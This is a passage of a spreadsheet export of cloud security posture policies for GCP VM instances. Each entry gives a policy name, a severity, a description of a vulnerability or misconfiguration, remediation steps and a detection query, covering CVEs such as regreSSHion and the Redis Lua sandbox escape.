      <c r="W2754" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have Resource Manager permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky Resource Manager permissions further helps attackers escalate their privileges and perform unauthorised actions in the cloud account. 
This policy checks for the following Resource Manager permissions:
'resourcemanager.organizations.setIamPolicy', 'resourcemanager.folders.setIamPolicy', 'resourcemanager.projects.setIamPolicy'.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2754"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754" t="inlineStr"/>
      <c r="Z2754" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned Resource Manager Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2754" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2754" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:42</t>
        </is>
      </c>
      <c r="AC2754" t="inlineStr"/>
      <c r="AD2754" t="b">
        <v>1</v>
      </c>
      <c r="AE2754" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2754" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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54" t="inlineStr">
        <is>
          <t>d189c4d4-6ef6-462d-8902-d5d7beb4a4f2</t>
        </is>
      </c>
      <c r="AI2754" t="inlineStr">
        <is>
          <t>f8bd6e9f-56e3-4d9b-902e-5bca16bea169</t>
        </is>
      </c>
      <c r="AJ2754" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2754" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2755">
      <c r="A2755" t="inlineStr"/>
      <c r="B2755" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2755" s="2" t="inlineStr"/>
      <c r="D2755" t="inlineStr"/>
      <c r="E2755" t="inlineStr"/>
      <c r="F2755" t="inlineStr"/>
      <c r="G2755" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2755" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2755" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Apache Submarine, CVE-2023-46302)</t>
        </is>
      </c>
      <c r="L2755" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2755" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2755" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2755" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2755" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2755" t="inlineStr"/>
      <c r="R2755" t="inlineStr"/>
      <c r="S2755" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2755" t="b">
        <v>0</v>
      </c>
      <c r="U2755" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2755" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2755" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46302).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Submarine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Submarine (CVE-2023-46302) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X275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CVE-2023-46302
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46302</t>
        </is>
      </c>
      <c r="Y2755" t="inlineStr"/>
      <c r="Z2755" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46302'))</t>
        </is>
      </c>
      <c r="AA2755" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2755" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:14</t>
        </is>
      </c>
      <c r="AC2755" t="inlineStr"/>
      <c r="AD2755" t="b">
        <v>1</v>
      </c>
      <c r="AE2755" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2755" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>514ff5e0-73ac-43d6-896b-ede818c71090</t>
        </is>
      </c>
      <c r="AI2755" t="inlineStr">
        <is>
          <t>f1632dcb-2e61-433e-88ca-89bdd03fcfda</t>
        </is>
      </c>
      <c r="AJ2755" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2755" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2756">
      <c r="A2756" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, kashan ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, MITRE ATT&amp;CK v12, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v3.2.1, Matt's ATT&amp;ACK, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], NIST SP 800-172, ISO 27001:2013, CIS Controls v8.1, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2756" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2756" s="2" t="inlineStr"/>
      <c r="D2756" t="inlineStr"/>
      <c r="E2756" t="inlineStr"/>
      <c r="F2756" t="inlineStr"/>
      <c r="G2756" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2756" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2756" t="inlineStr">
        <is>
          <t>GCP VM Instances enabled with Pre-Emptible termination</t>
        </is>
      </c>
      <c r="L2756" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2756" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2756" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2756" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2756" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2756" t="inlineStr">
        <is>
          <t>Guidelines for System Management</t>
        </is>
      </c>
      <c r="R2756" t="inlineStr">
        <is>
          <t>ISM-1511</t>
        </is>
      </c>
      <c r="S2756" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2756" t="b">
        <v>0</v>
      </c>
      <c r="U2756" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2756" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2756" t="inlineStr">
        <is>
          <t>Checks to verify if any VM instance is initiated with the flag 'Pre-Emptible termination' set to True. Setting this instance to True implies that this VM instance will shut down within 24 hours or can also be terminated by a Service Engine when high demand is encountered. While this might save costs, it can also lead to unexpected loss of service when the VM instance is terminated.</t>
        </is>
      </c>
      <c r="X2756" t="inlineStr">
        <is>
          <t>Once a VM instance is started with Pre-Emptible set to Yes, it cannot be changed. If this instance with Pre-Emptible set is a critical resource, then spin up a new VM instance with necessary services, processes, and updates so that there will be no interruption of services.</t>
        </is>
      </c>
      <c r="Y2756" t="inlineStr"/>
      <c r="Z2756" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = 'scheduling.preemptible equals true and (status equals RUNNING and name does not start with "gke-")'</t>
        </is>
      </c>
      <c r="AA2756" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2756" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2756" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-98</t>
        </is>
      </c>
      <c r="AD2756" t="b">
        <v>1</v>
      </c>
      <c r="AE2756" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2756" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>dbdc9748-f0c8-4591-b77f-fce5bb92636b</t>
        </is>
      </c>
      <c r="AI2756" t="inlineStr">
        <is>
          <t>18c893b6-041e-46a8-b52c-748fd77559db</t>
        </is>
      </c>
      <c r="AJ2756" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2756" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2757">
      <c r="A2757" t="inlineStr"/>
      <c r="B2757" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2757" s="2" t="inlineStr"/>
      <c r="D2757" t="inlineStr"/>
      <c r="E2757" t="inlineStr"/>
      <c r="F2757" t="inlineStr"/>
      <c r="G2757" t="b">
        <v>1</v>
      </c>
      <c r="H27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57" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2757" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2757" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with Cloud Run IAM policy Edit permissions</t>
        </is>
      </c>
      <c r="L2757" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2757" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2757" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2757" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2757" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2757" t="inlineStr"/>
      <c r="R2757" t="inlineStr"/>
      <c r="S2757" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2757" t="b">
        <v>0</v>
      </c>
      <c r="U2757" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2757" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2757" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have Cloud Run IAM policy Edit permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky Cloud Run IAM policy Edit permissions further helps attackers escalate their privileges and perform unauthorised actions in the cloud account.
This policy checks for the following Cloud Run IAM policy Edit permissions:
'run.services.setIamPolicy', 'iam.serviceAccounts.actAs'.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2757"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757" t="inlineStr"/>
      <c r="Z2757" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned Cloud Run IAM Policy Edit Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2757" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2757" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:45</t>
        </is>
      </c>
      <c r="AC2757" t="inlineStr"/>
      <c r="AD2757" t="b">
        <v>1</v>
      </c>
      <c r="AE2757" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2757" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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57" t="inlineStr">
        <is>
          <t>e27731d0-cf3a-4dca-b44b-d4205b0bce48</t>
        </is>
      </c>
      <c r="AI2757" t="inlineStr">
        <is>
          <t>ff613eef-6cf6-4848-9f85-5d650c6fad8a</t>
        </is>
      </c>
      <c r="AJ2757" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2757" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2758">
      <c r="A2758" t="inlineStr"/>
      <c r="B2758" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2758" s="2" t="inlineStr"/>
      <c r="D2758" t="n">
        <v>4</v>
      </c>
      <c r="E2758" t="n">
        <v>0</v>
      </c>
      <c r="F2758" t="n">
        <v>0</v>
      </c>
      <c r="G2758" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2758" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2758" t="inlineStr">
        <is>
          <t>Stored Cross Site scripting risk due to publicly exposed and vulnerable GCP VM instance [Jenkins, CVE-2023-27898]</t>
        </is>
      </c>
      <c r="L2758" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2758" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2758" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2758" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2758" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2758" t="inlineStr"/>
      <c r="R2758" t="inlineStr"/>
      <c r="S2758" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2758" t="b">
        <v>0</v>
      </c>
      <c r="U2758" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2758" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2758" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable stored cross-site scripting vulnerability [CVE-2023-27898].
Stored cross-site scripting vulnerability poses a significant threat by allowing attackers to inject malicious scripts into web applications, which can potentially lead to unauthorized data access, session hijacking, and other security breaches. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Jenkins [CVE-2023-27898] vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X275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CVE-2023-27898
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-27898</t>
        </is>
      </c>
      <c r="Y2758" t="inlineStr"/>
      <c r="Z2758" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-27898'))</t>
        </is>
      </c>
      <c r="AA2758" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2758" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2758" t="inlineStr"/>
      <c r="AD2758" t="b">
        <v>1</v>
      </c>
      <c r="AE2758" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2758" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>cc85f79a-748a-4761-9bcb-4c6855d6647d</t>
        </is>
      </c>
      <c r="AI2758" t="inlineStr">
        <is>
          <t>70ad928b-e709-4981-8795-4db7bf90a015</t>
        </is>
      </c>
      <c r="AJ2758" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2758" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2759">
      <c r="A2759" t="inlineStr"/>
      <c r="B2759" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2759" s="2" t="inlineStr"/>
      <c r="D2759" t="inlineStr"/>
      <c r="E2759" t="inlineStr"/>
      <c r="F2759" t="inlineStr"/>
      <c r="G2759" t="b">
        <v>1</v>
      </c>
      <c r="H27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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2759" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2759" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Redis Servers in Debian Linux, CVE-2022-0543)</t>
        </is>
      </c>
      <c r="L2759" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2759" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2759" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2759" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2759" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2759" t="inlineStr"/>
      <c r="R2759" t="inlineStr"/>
      <c r="S2759" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2759" t="b">
        <v>0</v>
      </c>
      <c r="U2759" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2759" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2759" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-0543).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Redis Servers in Debian Linux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Redis Servers in Debian Linux (CVE-2022-0543) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X275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CVE-2022-0543
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0543</t>
        </is>
      </c>
      <c r="Y2759" t="inlineStr"/>
      <c r="Z2759" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0543'))</t>
        </is>
      </c>
      <c r="AA2759" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2759" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:20</t>
        </is>
      </c>
      <c r="AC2759" t="inlineStr"/>
      <c r="AD2759" t="b">
        <v>1</v>
      </c>
      <c r="AE2759" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2759" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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59" t="inlineStr">
        <is>
          <t>fbc066ac-eff8-4e58-ae5a-c1f10747495d</t>
        </is>
      </c>
      <c r="AI2759" t="inlineStr">
        <is>
          <t>55dde971-7f69-489c-b072-b8c590637646</t>
        </is>
      </c>
      <c r="AJ2759" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2759" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2760">
      <c r="A2760" t="inlineStr"/>
      <c r="B2760" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2760" s="2" t="inlineStr"/>
      <c r="D2760" t="inlineStr"/>
      <c r="E2760" t="inlineStr"/>
      <c r="F2760" t="inlineStr"/>
      <c r="G2760" t="b">
        <v>1</v>
      </c>
      <c r="H27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760" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2760" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2760" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed GCP VM instance with regreSSHion vulnerability (OpenSSH, CVE-2024-6387)</t>
        </is>
      </c>
      <c r="L2760" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2760" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2760" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2760" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2760" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2760" t="inlineStr"/>
      <c r="R2760" t="inlineStr"/>
      <c r="S2760" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2760" t="b">
        <v>0</v>
      </c>
      <c r="U2760" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2760" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2760" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2024-6387).
regreSSHion (CVE-2024-6387) is an unauthenticated remote code execution flaw in OpenSSH's server (sshd) versions prior to 4.4p1 and OpenSSH versions between 8.5p1 and 9.8p1 (excluding) that permits attackers to obtain full root access. It impacts the default setup without requiring any user involvement, posing a significant security threat that could result in system breaches, data exfiltration, and the escalation of privileges for additional attacks. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the OpenSSH Remote code execution vulnerability on the publicly exposed GCP VM instance would allow an attacker to execute arbitrary code with the highest privileges, leading to a complete system takeover, malware installation, data manipulation and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks for the organization.
Immediate attention is required to remediate the OpenSSH (CVE-2024-6387) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X276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with Admin ports 22/2289
7. Select 'EDIT' under 'Source IPv4 ranges' remove (0.0.0.0/0) and add to the trusted IP address
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-6387
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to the below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-6387</t>
        </is>
      </c>
      <c r="Y2760" t="inlineStr"/>
      <c r="Z2760" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on Admin ports') AND with : (Vuln WHERE id IN ('CVE-2024-6387'))</t>
        </is>
      </c>
      <c r="AA2760" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2760" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:48</t>
        </is>
      </c>
      <c r="AC2760" t="inlineStr"/>
      <c r="AD2760" t="b">
        <v>1</v>
      </c>
      <c r="AE2760" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2760" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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60" t="inlineStr">
        <is>
          <t>c354cdff-227d-4fb0-9c64-ae1c330f86a8</t>
        </is>
      </c>
      <c r="AI2760" t="inlineStr">
        <is>
          <t>003d41f7-ae78-4965-9412-90940129bf83</t>
        </is>
      </c>
      <c r="AJ2760" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2760" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2761">
      <c r="A2761" t="inlineStr"/>
      <c r="B2761" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2761" s="2" t="inlineStr"/>
      <c r="D2761" t="inlineStr"/>
      <c r="E2761" t="inlineStr"/>
      <c r="F2761" t="inlineStr"/>
      <c r="G2761" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2761" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2761" t="inlineStr">
        <is>
          <t>Directory Traversal risk due to publicly exposed and vulnerable GCP VM instance (ONNX, CVE-2024-27318, CVE-2022-25882)</t>
        </is>
      </c>
      <c r="L2761" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2761" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2761" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2761" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2761" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2761" t="inlineStr"/>
      <c r="R2761" t="inlineStr"/>
      <c r="S2761" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2761" t="b">
        <v>0</v>
      </c>
      <c r="U2761" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2761" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2761" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have a known Directory Traversal vulnerability (ONNX, CVE-2024-27318, CVE-2022-25882).
CVE-2024-27318 vulnerability occurs as a bypass for the patch added for CVE-2022-25882 that affects ONNX which enables unauthorized file access or manipulation through a Directory Traversal attack. With a CVSS base score of 7.5, it involves improper validation of file paths in the external_data field of the tensor proto, affecting versions up to and including 1.15.0. This vulnerability allows an attacker to access files outside the intended directories on the host operating system, potentially leading to information disclosure and system compromise.
The fact that the GCP VM instance is publicly exposed makes it an easy target for attackers to exploit this vulnerability. Successful exploitation on the publicly exposed GCP VM instance could allow an attacker to access sensitive files, undermining the confidentiality and integrity of the system.
Immediate attention is required to remediate the ONNX (CVE-2024-27318, CVE-2022-25882) vulnerability and the public exposure reported for the affected GCP VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2761" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirement by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to Internet
4. Update VPC firewall rule that allow Internet access (0.0.0.0/0)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make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27318
https://nvd.nist.gov/vuln/detail/CVE-2022-25882</t>
        </is>
      </c>
      <c r="Y2761" t="inlineStr"/>
      <c r="Z2761" t="inlineStr">
        <is>
